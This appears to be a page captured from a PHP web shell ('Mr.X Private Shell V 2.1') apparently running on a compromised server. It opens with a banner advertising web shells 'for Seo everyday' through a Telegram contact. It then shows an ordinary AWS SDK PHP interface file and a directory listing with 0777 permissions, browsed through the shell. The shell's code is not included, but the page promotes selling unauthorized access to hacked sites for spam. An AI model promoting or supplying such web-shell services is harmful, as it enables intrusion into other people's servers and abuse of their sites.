__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace Aws\Identity;
/**
* Denotes the use of standard AWS credentials.
*
* @internal
*/
abstract class AwsCredentialIdentity implements IdentityInterface
{
/**
* Returns a UNIX timestamp, if available, representing the expiration
* time of the AWS Credential object. Returns null if no expiration is provided.
*
* @return int|null
*/
abstract public function getExpiration();
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| S3 | Folder | 0777 |
|
|
| AwsCredentialIdentity.php | File | 427 B | 0777 |
|
| BearerTokenIdentity.php | File | 423 B | 0777 |
|
| IdentityInterface.php | File | 499 B | 0777 |
|